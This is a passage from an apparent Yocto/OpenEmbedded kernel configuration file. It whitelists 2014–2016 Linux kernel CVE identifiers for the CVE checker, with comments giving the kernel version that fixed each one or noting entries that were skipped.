1106
1107# fixed-version: Fixed after version 3.18rc2
1108CVE_CHECK_WHITELIST += "CVE-2014-8480"
1109
1110# fixed-version: Fixed after version 3.18rc2
1111CVE_CHECK_WHITELIST += "CVE-2014-8481"
1112
1113# fixed-version: Fixed after version 3.19rc1
1114CVE_CHECK_WHITELIST += "CVE-2014-8559"
1115
1116# fixed-version: Fixed after version 3.14rc3
1117CVE_CHECK_WHITELIST += "CVE-2014-8709"
1118
1119# fixed-version: Fixed after version 3.18rc1
1120CVE_CHECK_WHITELIST += "CVE-2014-8884"
1121
1122# fixed-version: Fixed after version 3.19rc1
1123CVE_CHECK_WHITELIST += "CVE-2014-8989"
1124
1125# fixed-version: Fixed after version 3.18rc6
1126CVE_CHECK_WHITELIST += "CVE-2014-9090"
1127
1128# fixed-version: Fixed after version 3.18rc6
1129CVE_CHECK_WHITELIST += "CVE-2014-9322"
1130
1131# fixed-version: Fixed after version 3.19rc1
1132CVE_CHECK_WHITELIST += "CVE-2014-9419"
1133
1134# fixed-version: Fixed after version 3.19rc1
1135CVE_CHECK_WHITELIST += "CVE-2014-9420"
1136
1137# fixed-version: Fixed after version 3.19rc3
1138CVE_CHECK_WHITELIST += "CVE-2014-9428"
1139
1140# fixed-version: Fixed after version 3.19rc4
1141CVE_CHECK_WHITELIST += "CVE-2014-9529"
1142
1143# fixed-version: Fixed after version 3.19rc3
1144CVE_CHECK_WHITELIST += "CVE-2014-9584"
1145
1146# fixed-version: Fixed after version 3.19rc4
1147CVE_CHECK_WHITELIST += "CVE-2014-9585"
1148
1149# fixed-version: Fixed after version 3.19rc1
1150CVE_CHECK_WHITELIST += "CVE-2014-9644"
1151
1152# fixed-version: Fixed after version 3.19rc1
1153CVE_CHECK_WHITELIST += "CVE-2014-9683"
1154
1155# fixed-version: Fixed after version 3.19rc1
1156CVE_CHECK_WHITELIST += "CVE-2014-9710"
1157
1158# fixed-version: Fixed after version 3.15rc1
1159CVE_CHECK_WHITELIST += "CVE-2014-9715"
1160
1161# fixed-version: Fixed after version 4.1rc1
1162CVE_CHECK_WHITELIST += "CVE-2014-9717"
1163
1164# fixed-version: Fixed after version 3.19rc3
1165CVE_CHECK_WHITELIST += "CVE-2014-9728"
1166
1167# fixed-version: Fixed after version 3.19rc3
1168CVE_CHECK_WHITELIST += "CVE-2014-9729"
1169
1170# fixed-version: Fixed after version 3.19rc3
1171CVE_CHECK_WHITELIST += "CVE-2014-9730"
1172
1173# fixed-version: Fixed after version 3.19rc3
1174CVE_CHECK_WHITELIST += "CVE-2014-9731"
1175
1176# Skipping CVE-2014-9777, no affected_versions
1177
1178# Skipping CVE-2014-9778, no affected_versions
1179
1180# Skipping CVE-2014-9779, no affected_versions
1181
1182# Skipping CVE-2014-9780, no affected_versions
1183
1184# Skipping CVE-2014-9781, no affected_versions
1185
1186# Skipping CVE-2014-9782, no affected_versions
1187
1188# Skipping CVE-2014-9783, no affected_versions
1189
1190# Skipping CVE-2014-9784, no affected_versions
1191
1192# Skipping CVE-2014-9785, no affected_versions
1193
1194# Skipping CVE-2014-9786, no affected_versions
1195
1196# Skipping CVE-2014-9787, no affected_versions
1197
1198# Skipping CVE-2014-9788, no affected_versions
1199
1200# Skipping CVE-2014-9789, no affected_versions
1201
1202# fixed-version: Fixed after version 3.16rc1
1203CVE_CHECK_WHITELIST += "CVE-2014-9803"
1204
1205# Skipping CVE-2014-9863, no affected_versions
1206
1207# Skipping CVE-2014-9864, no affected_versions
1208
1209# Skipping CVE-2014-9865, no affected_versions
1210
1211# Skipping CVE-2014-9866, no affected_versions
1212
1213# Skipping CVE-2014-9867, no affected_versions
1214
1215# Skipping CVE-2014-9868, no affected_versions
1216
1217# Skipping CVE-2014-9869, no affected_versions
1218
1219# fixed-version: Fixed after version 3.11rc1
1220CVE_CHECK_WHITELIST += "CVE-2014-9870"
1221
1222# Skipping CVE-2014-9871, no affected_versions
1223
1224# Skipping CVE-2014-9872, no affected_versions
1225
1226# Skipping CVE-2014-9873, no affected_versions
1227
1228# Skipping CVE-2014-9874, no affected_versions
1229
1230# Skipping CVE-2014-9875, no affected_versions
1231
1232# Skipping CVE-2014-9876, no affected_versions
1233
1234# Skipping CVE-2014-9877, no affected_versions
1235
1236# Skipping CVE-2014-9878, no affected_versions
1237
1238# Skipping CVE-2014-9879, no affected_versions
1239
1240# Skipping CVE-2014-9880, no affected_versions
1241
1242# Skipping CVE-2014-9881, no affected_versions
1243
1244# Skipping CVE-2014-9882, no affected_versions
1245
1246# Skipping CVE-2014-9883, no affected_versions
1247
1248# Skipping CVE-2014-9884, no affected_versions
1249
1250# Skipping CVE-2014-9885, no affected_versions
1251
1252# Skipping CVE-2014-9886, no affected_versions
1253
1254# Skipping CVE-2014-9887, no affected_versions
1255
1256# fixed-version: Fixed after version 3.13rc1
1257CVE_CHECK_WHITELIST += "CVE-2014-9888"
1258
1259# Skipping CVE-2014-9889, no affected_versions
1260
1261# Skipping CVE-2014-9890, no affected_versions
1262
1263# Skipping CVE-2014-9891, no affected_versions
1264
1265# Skipping CVE-2014-9892, no affected_versions
1266
1267# Skipping CVE-2014-9893, no affected_versions
1268
1269# Skipping CVE-2014-9894, no affected_versions
1270
1271# fixed-version: Fixed after version 3.11rc1
1272CVE_CHECK_WHITELIST += "CVE-2014-9895"
1273
1274# Skipping CVE-2014-9896, no affected_versions
1275
1276# Skipping CVE-2014-9897, no affected_versions
1277
1278# Skipping CVE-2014-9898, no affected_versions
1279
1280# Skipping CVE-2014-9899, no affected_versions
1281
1282# Skipping CVE-2014-9900, no affected_versions
1283
1284# fixed-version: Fixed after version 3.14rc4
1285CVE_CHECK_WHITELIST += "CVE-2014-9903"
1286
1287# fixed-version: Fixed after version 3.17rc1
1288CVE_CHECK_WHITELIST += "CVE-2014-9904"
1289
1290# fixed-version: Fixed after version 3.16rc1
1291CVE_CHECK_WHITELIST += "CVE-2014-9914"
1292
1293# fixed-version: Fixed after version 3.18rc2
1294CVE_CHECK_WHITELIST += "CVE-2014-9922"
1295
1296# fixed-version: Fixed after version 3.19rc1
1297CVE_CHECK_WHITELIST += "CVE-2014-9940"
1298
1299# fixed-version: Fixed after version 3.19rc6
1300CVE_CHECK_WHITELIST += "CVE-2015-0239"
1301
1302# fixed-version: Fixed after version 3.15rc5
1303CVE_CHECK_WHITELIST += "CVE-2015-0274"
1304
1305# fixed-version: Fixed after version 4.1rc1
1306CVE_CHECK_WHITELIST += "CVE-2015-0275"
1307
1308# Skipping CVE-2015-0777, no affected_versions
1309
1310# Skipping CVE-2015-1328, no affected_versions
1311
1312# fixed-version: Fixed after version 4.2rc5
1313CVE_CHECK_WHITELIST += "CVE-2015-1333"
1314
1315# fixed-version: Fixed after version 4.4rc5
1316CVE_CHECK_WHITELIST += "CVE-2015-1339"
1317
1318# fixed-version: Fixed after version 4.9rc1
1319CVE_CHECK_WHITELIST += "CVE-2015-1350"
1320
1321# fixed-version: Fixed after version 4.1rc7
1322CVE_CHECK_WHITELIST += "CVE-2015-1420"
1323
1324# fixed-version: Fixed after version 3.19rc7
1325CVE_CHECK_WHITELIST += "CVE-2015-1421"
1326
1327# fixed-version: Fixed after version 3.19rc7
1328CVE_CHECK_WHITELIST += "CVE-2015-1465"
1329
1330# fixed-version: Fixed after version 3.19rc5
1331CVE_CHECK_WHITELIST += "CVE-2015-1573"
1332
1333# fixed-version: Fixed after version 4.0rc1
1334CVE_CHECK_WHITELIST += "CVE-2015-1593"
1335
1336# fixed-version: Fixed after version 3.16rc1
1337CVE_CHECK_WHITELIST += "CVE-2015-1805"
1338
1339# fixed-version: Fixed after version 3.19rc7
1340CVE_CHECK_WHITELIST += "CVE-2015-2041"
1341
1342# fixed-version: Fixed after version 3.19
1343CVE_CHECK_WHITELIST += "CVE-2015-2042"
1344
1345# fixed-version: Fixed after version 4.0rc4
1346CVE_CHECK_WHITELIST += "CVE-2015-2150"
1347
1348# fixed-version: Fixed after version 4.0rc1
1349CVE_CHECK_WHITELIST += "CVE-2015-2666"
1350
1351# fixed-version: Fixed after version 4.0rc3
1352CVE_CHECK_WHITELIST += "CVE-2015-2672"
1353
1354# fixed-version: Fixed after version 4.0rc6
1355CVE_CHECK_WHITELIST += "CVE-2015-2686"
1356
1357# fixed-version: Fixed after version 4.0rc3
1358CVE_CHECK_WHITELIST += "CVE-2015-2830"
1359
1360# CVE-2015-2877 has no known resolution
1361
1362# fixed-version: Fixed after version 4.0rc7
1363CVE_CHECK_WHITELIST += "CVE-2015-2922"
1364
1365# fixed-version: Fixed after version 4.3rc1
1366CVE_CHECK_WHITELIST += "CVE-2015-2925"
1367
1368# fixed-version: Fixed after version 4.2rc1
1369CVE_CHECK_WHITELIST += "CVE-2015-3212"
1370
1371# fixed-version: Fixed after version 2.6.33rc8
1372CVE_CHECK_WHITELIST += "CVE-2015-3214"
1373
1374# fixed-version: Fixed after version 4.2rc2
1375CVE_CHECK_WHITELIST += "CVE-2015-3288"
1376
1377# fixed-version: Fixed after version 4.2rc3
1378CVE_CHECK_WHITELIST += "CVE-2015-3290"
1379
1380# fixed-version: Fixed after version 4.2rc3
1381CVE_CHECK_WHITELIST += "CVE-2015-3291"
1382
1383# fixed-version: Fixed after version 4.0rc5
1384CVE_CHECK_WHITELIST += "CVE-2015-3331"
1385
1386# Skipping CVE-2015-3332, no affected_versions
1387
1388# fixed-version: Fixed after version 4.1rc1
1389CVE_CHECK_WHITELIST += "CVE-2015-3339"
1390
1391# fixed-version: Fixed after version 4.1rc2
1392CVE_CHECK_WHITELIST += "CVE-2015-3636"
1393
1394# fixed-version: Fixed after version 4.1rc7
1395CVE_CHECK_WHITELIST += "CVE-2015-4001"
1396
1397# fixed-version: Fixed after version 4.1rc7
1398CVE_CHECK_WHITELIST += "CVE-2015-4002"
1399
1400# fixed-version: Fixed after version 4.1rc7
1401CVE_CHECK_WHITELIST += "CVE-2015-4003"
1402
1403# fixed-version: Fixed after version 4.3rc1
1404CVE_CHECK_WHITELIST += "CVE-2015-4004"
1405
1406# fixed-version: Fixed after version 4.0rc1
1407CVE_CHECK_WHITELIST += "CVE-2015-4036"
1408
1409# fixed-version: Fixed after version 4.0rc1
1410CVE_CHECK_WHITELIST += "CVE-2015-4167"
1411
1412# fixed-version: Fixed after version 3.13rc5
1413CVE_CHECK_WHITELIST += "CVE-2015-4170"
1414
1415# fixed-version: Fixed after version 4.1rc1
1416CVE_CHECK_WHITELIST += "CVE-2015-4176"
1417
1418# fixed-version: Fixed after version 4.1rc1
1419CVE_CHECK_WHITELIST += "CVE-2015-4177"
1420
1421# fixed-version: Fixed after version 4.1rc1
1422CVE_CHECK_WHITELIST += "CVE-2015-4178"
1423
1424# fixed-version: Fixed after version 4.2rc1
1425CVE_CHECK_WHITELIST += "CVE-2015-4692"
1426
1427# fixed-version: Fixed after version 4.1rc6
1428CVE_CHECK_WHITELIST += "CVE-2015-4700"
1429
1430# fixed-version: Fixed after version 4.2rc7
1431CVE_CHECK_WHITELIST += "CVE-2015-5156"
1432
1433# fixed-version: Fixed after version 4.2rc3
1434CVE_CHECK_WHITELIST += "CVE-2015-5157"
1435
1436# fixed-version: Fixed after version 4.3rc3
1437CVE_CHECK_WHITELIST += "CVE-2015-5257"
1438
1439# fixed-version: Fixed after version 4.3rc3
1440CVE_CHECK_WHITELIST += "CVE-2015-5283"
1441
1442# fixed-version: Fixed after version 4.4rc1
1443CVE_CHECK_WHITELIST += "CVE-2015-5307"
1444
1445# fixed-version: Fixed after version 4.4rc1
1446CVE_CHECK_WHITELIST += "CVE-2015-5327"
1447
1448# fixed-version: Fixed after version 4.1rc7
1449CVE_CHECK_WHITELIST += "CVE-2015-5364"
1450
1451# fixed-version: Fixed after version 4.1rc7
1452CVE_CHECK_WHITELIST += "CVE-2015-5366"
1453
1454# fixed-version: Fixed after version 4.2rc6
1455CVE_CHECK_WHITELIST += "CVE-2015-5697"
1456
1457# fixed-version: Fixed after version 4.1rc3
1458CVE_CHECK_WHITELIST += "CVE-2015-5706"
1459
1460# fixed-version: Fixed after version 4.1rc1
1461CVE_CHECK_WHITELIST += "CVE-2015-5707"
1462
1463# fixed-version: Fixed after version 4.2rc5
1464CVE_CHECK_WHITELIST += "CVE-2015-6252"
1465
1466# fixed-version: Fixed after version 4.1rc1
1467CVE_CHECK_WHITELIST += "CVE-2015-6526"
1468
1469# CVE-2015-6619 has no known resolution
1470
1471# CVE-2015-6646 has no known resolution
1472
1473# fixed-version: Fixed after version 4.3rc1
1474CVE_CHECK_WHITELIST += "CVE-2015-6937"
1475
1476# Skipping CVE-2015-7312, no affected_versions
1477
1478# fixed-version: Fixed after version 3.7rc1
1479CVE_CHECK_WHITELIST += "CVE-2015-7509"
1480
1481# fixed-version: Fixed after version 4.4rc7
1482CVE_CHECK_WHITELIST += "CVE-2015-7513"
1483
1484# fixed-version: Fixed after version 4.4rc6
1485CVE_CHECK_WHITELIST += "CVE-2015-7515"
1486
1487# fixed-version: Fixed after version 4.4rc8
1488CVE_CHECK_WHITELIST += "CVE-2015-7550"
1489
1490# Skipping CVE-2015-7553, no affected_versions
1491
1492# fixed-version: Fixed after version 4.5rc2
1493CVE_CHECK_WHITELIST += "CVE-2015-7566"
1494
1495# fixed-version: Fixed after version 4.3rc4
1496CVE_CHECK_WHITELIST += "CVE-2015-7613"
1497
1498# fixed-version: Fixed after version 4.4rc1
1499CVE_CHECK_WHITELIST += "CVE-2015-7799"
1500
1501# fixed-version: Fixed after version 4.6rc6
1502CVE_CHECK_WHITELIST += "CVE-2015-7833"
1503
1504# Skipping CVE-2015-7837, no affected_versions
1505
1506# fixed-version: Fixed after version 4.3rc7
1507CVE_CHECK_WHITELIST += "CVE-2015-7872"
1508
1509# fixed-version: Fixed after version 4.4rc1
1510CVE_CHECK_WHITELIST += "CVE-2015-7884"
1511
1512# fixed-version: Fixed after version 4.4rc1
1513CVE_CHECK_WHITELIST += "CVE-2015-7885"
1514
1515# fixed-version: Fixed after version 4.4rc4
1516CVE_CHECK_WHITELIST += "CVE-2015-7990"
1517
1518# Skipping CVE-2015-8019, no affected_versions
1519
1520# fixed-version: Fixed after version 4.4rc1
1521CVE_CHECK_WHITELIST += "CVE-2015-8104"
1522
1523# fixed-version: Fixed after version 4.0rc3
1524CVE_CHECK_WHITELIST += "CVE-2015-8215"
1525
1526# fixed-version: Fixed after version 2.6.34rc1
1527CVE_CHECK_WHITELIST += "CVE-2015-8324"
1528
1529# fixed-version: Fixed after version 4.4rc1
1530CVE_CHECK_WHITELIST += "CVE-2015-8374"
1531
1532# fixed-version: Fixed after version 4.4rc3
1533CVE_CHECK_WHITELIST += "CVE-2015-8539"
1534
1535# fixed-version: Fixed after version 4.4rc6
1536CVE_CHECK_WHITELIST += "CVE-2015-8543"
1537
1538# fixed-version: Fixed after version 4.4rc6
1539CVE_CHECK_WHITELIST += "CVE-2015-8550"
1540
1541# fixed-version: Fixed after version 4.4rc6
1542CVE_CHECK_WHITELIST += "CVE-2015-8551"
1543
1544# fixed-version: Fixed after version 4.4rc6
1545CVE_CHECK_WHITELIST += "CVE-2015-8552"
1546
1547# fixed-version: Fixed after version 4.4rc6
1548CVE_CHECK_WHITELIST += "CVE-2015-8553"
1549
1550# fixed-version: Fixed after version 4.4rc6
1551CVE_CHECK_WHITELIST += "CVE-2015-8569"
1552
1553# fixed-version: Fixed after version 4.4rc6
1554CVE_CHECK_WHITELIST += "CVE-2015-8575"
1555
1556# fixed-version: Fixed after version 4.4rc4
1557CVE_CHECK_WHITELIST += "CVE-2015-8660"
1558
1559# fixed-version: Fixed after version 4.10rc1
1560CVE_CHECK_WHITELIST += "CVE-2015-8709"
1561
1562# fixed-version: Fixed after version 4.3rc1
1563CVE_CHECK_WHITELIST += "CVE-2015-8746"
1564
1565# fixed-version: Fixed after version 4.3rc4
1566CVE_CHECK_WHITELIST += "CVE-2015-8767"
1567
1568# fixed-version: Fixed after version 4.4rc5
1569CVE_CHECK_WHITELIST += "CVE-2015-8785"
1570
1571# fixed-version: Fixed after version 4.4rc1
1572CVE_CHECK_WHITELIST += "CVE-2015-8787"
1573
1574# fixed-version: Fixed after version 4.5rc1
1575CVE_CHECK_WHITELIST += "CVE-2015-8812"
1576
1577# fixed-version: Fixed after version 4.4rc6
1578CVE_CHECK_WHITELIST += "CVE-2015-8816"
1579
1580# fixed-version: Fixed after version 4.1rc1
1581CVE_CHECK_WHITELIST += "CVE-2015-8830"
1582
1583# fixed-version: Fixed after version 4.5rc1
1584CVE_CHECK_WHITELIST += "CVE-2015-8839"
1585
1586# fixed-version: Fixed after version 4.4rc3
1587CVE_CHECK_WHITELIST += "CVE-2015-8844"
1588
1589# fixed-version: Fixed after version 4.4rc3
1590CVE_CHECK_WHITELIST += "CVE-2015-8845"
1591
1592# Skipping CVE-2015-8937, no affected_versions
1593
1594# Skipping CVE-2015-8938, no affected_versions
1595
1596# Skipping CVE-2015-8939, no affected_versions
1597
1598# Skipping CVE-2015-8940, no affected_versions
1599
1600# Skipping CVE-2015-8941, no affected_versions
1601
1602# Skipping CVE-2015-8942, no affected_versions
1603
1604# Skipping CVE-2015-8943, no affected_versions
1605
1606# Skipping CVE-2015-8944, no affected_versions
1607
1608# fixed-version: Fixed after version 4.1rc2
1609CVE_CHECK_WHITELIST += "CVE-2015-8950"
1610
1611# fixed-version: Fixed after version 4.6rc1
1612CVE_CHECK_WHITELIST += "CVE-2015-8952"
1613
1614# fixed-version: Fixed after version 4.3
1615CVE_CHECK_WHITELIST += "CVE-2015-8953"
1616
1617# fixed-version: Fixed after version 4.1rc1
1618CVE_CHECK_WHITELIST += "CVE-2015-8955"
1619
1620# fixed-version: Fixed after version 4.2rc1
1621CVE_CHECK_WHITELIST += "CVE-2015-8956"
1622
1623# fixed-version: Fixed after version 4.4rc1
1624CVE_CHECK_WHITELIST += "CVE-2015-8961"
1625
1626# fixed-version: Fixed after version 4.4rc1
1627CVE_CHECK_WHITELIST += "CVE-2015-8962"
1628
1629# fixed-version: Fixed after version 4.4
1630CVE_CHECK_WHITELIST += "CVE-2015-8963"
1631
1632# fixed-version: Fixed after version 4.5rc1
1633CVE_CHECK_WHITELIST += "CVE-2015-8964"
1634
1635# fixed-version: Fixed after version 4.4rc8
1636CVE_CHECK_WHITELIST += "CVE-2015-8966"
1637
1638# fixed-version: Fixed after version 4.0rc1
1639CVE_CHECK_WHITELIST += "CVE-2015-8967"
1640
1641# fixed-version: Fixed after version 4.5rc1
1642CVE_CHECK_WHITELIST += "CVE-2015-8970"
1643
1644# fixed-version: Fixed after version 3.19rc7
1645CVE_CHECK_WHITELIST += "CVE-2015-9004"
1646
1647# fixed-version: Fixed after version 4.3rc1
1648CVE_CHECK_WHITELIST += "CVE-2015-9016"
1649
1650# fixed-version: Fixed after version 4.2rc1
1651CVE_CHECK_WHITELIST += "CVE-2015-9289"
1652
1653# fixed-version: Fixed after version 4.5rc1
1654CVE_CHECK_WHITELIST += "CVE-2016-0617"
1655
1656# fixed-version: Fixed after version 4.5rc2
1657CVE_CHECK_WHITELIST += "CVE-2016-0723"
1658
1659# fixed-version: Fixed after version 4.5rc1
1660CVE_CHECK_WHITELIST += "CVE-2016-0728"
1661
1662# fixed-version: Fixed after version 4.6
1663CVE_CHECK_WHITELIST += "CVE-2016-0758"
1664
1665# Skipping CVE-2016-0774, no affected_versions
1666
1667# fixed-version: Fixed after version 4.3rc1
1668CVE_CHECK_WHITELIST += "CVE-2016-0821"
1669
1670# fixed-version: Fixed after version 4.0rc5
1671CVE_CHECK_WHITELIST += "CVE-2016-0823"
1672
1673# fixed-version: Fixed after version 4.8rc7
1674CVE_CHECK_WHITELIST += "CVE-2016-10044"
1675
1676# fixed-version: Fixed after version 4.10rc1
1677CVE_CHECK_WHITELIST += "CVE-2016-10088"
1678
1679# fixed-version: Fixed after version 4.9
1680CVE_CHECK_WHITELIST += "CVE-2016-10147"
1681
1682# fixed-version: Fixed after version 4.9rc8
1683CVE_CHECK_WHITELIST += "CVE-2016-10150"
1684
1685# fixed-version: Fixed after version 4.10rc1
1686CVE_CHECK_WHITELIST += "CVE-2016-10153"
1687
1688# fixed-version: Fixed after version 4.10rc1
1689CVE_CHECK_WHITELIST += "CVE-2016-10154"
1690
1691# fixed-version: Fixed after version 4.9rc7
1692CVE_CHECK_WHITELIST += "CVE-2016-10200"
1693
1694# fixed-version: Fixed after version 4.10rc1
1695CVE_CHECK_WHITELIST += "CVE-2016-10208"
1696
1697# fixed-version: Fixed after version 4.5rc1
1698CVE_CHECK_WHITELIST += "CVE-2016-10229"
1699
1700# fixed-version: Fixed after version 4.8rc6
1701CVE_CHECK_WHITELIST += "CVE-2016-10318"
1702
1703# fixed-version: Fixed after version 4.19rc1
1704CVE_CHECK_WHITELIST += "CVE-2016-10723"
1705
1706# fixed-version: Fixed after version 4.10rc1
1707CVE_CHECK_WHITELIST += "CVE-2016-10741"
1708
1709# fixed-version: Fixed after version 4.10rc1
1710CVE_CHECK_WHITELIST += "CVE-2016-10764"
1711
1712# fixed-version: Fixed after version 4.8rc1
1713CVE_CHECK_WHITELIST += "CVE-2016-10905"
1714
1715# fixed-version: Fixed after version 4.5rc6
1716CVE_CHECK_WHITELIST += "CVE-2016-10906"
1717
1718# fixed-version: Fixed after version 4.9rc1
1719CVE_CHECK_WHITELIST += "CVE-2016-10907"
1720
1721# fixed-version: Fixed after version 4.7rc5
1722CVE_CHECK_WHITELIST += "CVE-2016-1237"
1723
1724# fixed-version: Fixed after version 4.5rc1
1725CVE_CHECK_WHITELIST += "CVE-2016-1575"
1726
1727# fixed-version: Fixed after version 4.5rc1
1728CVE_CHECK_WHITELIST += "CVE-2016-1576"
1729
1730# fixed-version: Fixed after version 4.7rc3
1731CVE_CHECK_WHITELIST += "CVE-2016-1583"
1732
1733# fixed-version: Fixed after version 4.3rc1
1734CVE_CHECK_WHITELIST += "CVE-2016-2053"
1735
1736# fixed-version: Fixed after version 4.5rc1
1737CVE_CHECK_WHITELIST += "CVE-2016-2069"
1738
1739# fixed-version: Fixed after version 4.4
1740CVE_CHECK_WHITELIST += "CVE-2016-2070"
1741
1742# fixed-version: Fixed after version 4.5rc4
1743CVE_CHECK_WHITELIST += "CVE-2016-2085"
1744
1745# fixed-version: Fixed after version 4.6rc5
1746CVE_CHECK_WHITELIST += "CVE-2016-2117"
1747
1748# fixed-version: Fixed after version 4.5
1749CVE_CHECK_WHITELIST += "CVE-2016-2143"
1750
1751# fixed-version: Fixed after version 4.6rc1
1752CVE_CHECK_WHITELIST += "CVE-2016-2184"
1753
1754# fixed-version: Fixed after version 4.6rc1
1755CVE_CHECK_WHITELIST += "CVE-2016-2185"
1756
1757# fixed-version: Fixed after version 4.6rc1
1758CVE_CHECK_WHITELIST += "CVE-2016-2186"
1759
1760# fixed-version: Fixed after version 4.6rc5
1761CVE_CHECK_WHITELIST += "CVE-2016-2187"
1762
1763# fixed-version: Fixed after version 4.11rc2
1764CVE_CHECK_WHITELIST += "CVE-2016-2188"
1765
1766# fixed-version: Fixed after version 4.5rc4
1767CVE_CHECK_WHITELIST += "CVE-2016-2383"
1768
1769# fixed-version: Fixed after version 4.5rc4
1770CVE_CHECK_WHITELIST += "CVE-2016-2384"
1771
1772# fixed-version: Fixed after version 4.5rc1
1773CVE_CHECK_WHITELIST += "CVE-2016-2543"
1774
1775# fixed-version: Fixed after version 4.5rc1
1776CVE_CHECK_WHITELIST += "CVE-2016-2544"
1777
1778# fixed-version: Fixed after version 4.5rc1
1779CVE_CHECK_WHITELIST += "CVE-2016-2545"
1780
1781# fixed-version: Fixed after version 4.5rc1
1782CVE_CHECK_WHITELIST += "CVE-2016-2546"
1783
1784# fixed-version: Fixed after version 4.5rc1
1785CVE_CHECK_WHITELIST += "CVE-2016-2547"
1786
1787# fixed-version: Fixed after version 4.5rc1
1788CVE_CHECK_WHITELIST += "CVE-2016-2548"
1789
1790# fixed-version: Fixed after version 4.5rc1
1791CVE_CHECK_WHITELIST += "CVE-2016-2549"
1792
1793# fixed-version: Fixed after version 4.5rc4
1794CVE_CHECK_WHITELIST += "CVE-2016-2550"
1795
1796# fixed-version: Fixed after version 4.5rc2
1797CVE_CHECK_WHITELIST += "CVE-2016-2782"
1798
1799# fixed-version: Fixed after version 4.5rc1
1800CVE_CHECK_WHITELIST += "CVE-2016-2847"
1801
1802# Skipping CVE-2016-2853, no affected_versions
1803
1804# Skipping CVE-2016-2854, no affected_versions
1805
1806# fixed-version: Fixed after version 4.5
1807CVE_CHECK_WHITELIST += "CVE-2016-3044"
1808
1809# fixed-version: Fixed after version 4.4rc1
1810CVE_CHECK_WHITELIST += "CVE-2016-3070"
1811
1812# fixed-version: Fixed after version 4.6rc2
1813CVE_CHECK_WHITELIST += "CVE-2016-3134"
1814
1815# fixed-version: Fixed after version 4.6rc1
1816CVE_CHECK_WHITELIST += "CVE-2016-3135"
1817
1818# fixed-version: Fixed after version 4.6rc3
1819CVE_CHECK_WHITELIST += "CVE-2016-3136"
1820
1821# fixed-version: Fixed after version 4.6rc3
1822CVE_CHECK_WHITELIST += "CVE-2016-3137"
1823
1824# fixed-version: Fixed after version 4.6rc1
1825CVE_CHECK_WHITELIST += "CVE-2016-3138"
1826
1827# fixed-version: Fixed after version 3.17rc1
1828CVE_CHECK_WHITELIST += "CVE-2016-3139"
1829
1830# fixed-version: Fixed after version 4.6rc3
1831CVE_CHECK_WHITELIST += "CVE-2016-3140"
1832
1833# fixed-version: Fixed after version 4.6rc1
1834CVE_CHECK_WHITELIST += "CVE-2016-3156"
1835
1836# fixed-version: Fixed after version 4.6rc1
1837CVE_CHECK_WHITELIST += "CVE-2016-3157"
1838
1839# fixed-version: Fixed after version 4.6rc1
1840CVE_CHECK_WHITELIST += "CVE-2016-3672"
1841
1842# fixed-version: Fixed after version 4.6rc1
1843CVE_CHECK_WHITELIST += "CVE-2016-3689"
1844
1845# Skipping CVE-2016-3695, no affected_versions
1846
1847# Skipping CVE-2016-3699, no affected_versions
1848
1849# Skipping CVE-2016-3707, no affected_versions
1850
1851# fixed-version: Fixed after version 4.7rc1
1852CVE_CHECK_WHITELIST += "CVE-2016-3713"
1853
1854# CVE-2016-3775 has no known resolution
1855
1856# CVE-2016-3802 has no known resolution
1857
1858# CVE-2016-3803 has no known resolution
1859
1860# fixed-version: Fixed after version 4.4rc4
1861CVE_CHECK_WHITELIST += "CVE-2016-3841"
1862
1863# fixed-version: Fixed after version 4.8rc2
1864CVE_CHECK_WHITELIST += "CVE-2016-3857"
1865
1866# fixed-version: Fixed after version 4.5
1867CVE_CHECK_WHITELIST += "CVE-2016-3951"
1868
1869# fixed-version: Fixed after version 4.6rc3
1870CVE_CHECK_WHITELIST += "CVE-2016-3955"
1871
1872# fixed-version: Fixed after version 4.6rc5
1873CVE_CHECK_WHITELIST += "CVE-2016-3961"
1874
1875# fixed-version: Fixed after version 4.7rc1
1876CVE_CHECK_WHITELIST += "CVE-2016-4440"
1877
1878# fixed-version: Fixed after version 4.7rc4
1879CVE_CHECK_WHITELIST += "CVE-2016-4470"
1880
1881# fixed-version: Fixed after version 4.7rc1
1882CVE_CHECK_WHITELIST += "CVE-2016-4482"
1883
1884# fixed-version: Fixed after version 4.6
1885CVE_CHECK_WHITELIST += "CVE-2016-4485"
1886
1887# fixed-version: Fixed after version 4.6
1888CVE_CHECK_WHITELIST += "CVE-2016-4486"
1889
1890# fixed-version: Fixed after version 4.6rc6
1891CVE_CHECK_WHITELIST += "CVE-2016-4557"
1892
1893# fixed-version: Fixed after version 4.6rc7
1894CVE_CHECK_WHITELIST += "CVE-2016-4558"
1895
1896# fixed-version: Fixed after version 4.6rc6
1897CVE_CHECK_WHITELIST += "CVE-2016-4565"
1898
1899# fixed-version: Fixed after version 4.6rc6
1900CVE_CHECK_WHITELIST += "CVE-2016-4568"
1901
1902# fixed-version: Fixed after version 4.7rc1
1903CVE_CHECK_WHITELIST += "CVE-2016-4569"
1904
1905# fixed-version: Fixed after version 4.7rc1
1906CVE_CHECK_WHITELIST += "CVE-2016-4578"
1907
1908# fixed-version: Fixed after version 4.6
1909CVE_CHECK_WHITELIST += "CVE-2016-4580"
1910
1911# fixed-version: Fixed after version 4.6rc7
1912CVE_CHECK_WHITELIST += "CVE-2016-4581"
1913
1914# fixed-version: Fixed after version 4.7rc4
1915CVE_CHECK_WHITELIST += "CVE-2016-4794"
1916
1917# fixed-version: Fixed after version 4.6rc1
1918CVE_CHECK_WHITELIST += "CVE-2016-4805"
1919
1920# fixed-version: Fixed after version 4.6
1921CVE_CHECK_WHITELIST += "CVE-2016-4913"
1922
1923# fixed-version: Fixed after version 4.7rc1
1924CVE_CHECK_WHITELIST += "CVE-2016-4951"
1925
1926# fixed-version: Fixed after version 4.7rc1
1927CVE_CHECK_WHITELIST += "CVE-2016-4997"
1928
1929# fixed-version: Fixed after version 4.7rc1
1930CVE_CHECK_WHITELIST += "CVE-2016-4998"
1931
1932# fixed-version: Fixed after version 4.9rc2
1933CVE_CHECK_WHITELIST += "CVE-2016-5195"
1934
1935# fixed-version: Fixed after version 4.7rc3
1936CVE_CHECK_WHITELIST += "CVE-2016-5243"
1937
1938# fixed-version: Fixed after version 4.7rc3
1939CVE_CHECK_WHITELIST += "CVE-2016-5244"
1940
1941# Skipping CVE-2016-5340, no affected_versions
1942
1943# Skipping CVE-2016-5342, no affected_versions
1944
1945# Skipping CVE-2016-5343, no affected_versions
1946
1947# Skipping CVE-2016-5344, no affected_versions
1948
1949# fixed-version: Fixed after version 4.7
1950CVE_CHECK_WHITELIST += "CVE-2016-5400"
1951
1952# fixed-version: Fixed after version 4.8rc1
1953CVE_CHECK_WHITELIST += "CVE-2016-5412"
1954
1955# fixed-version: Fixed after version 4.7
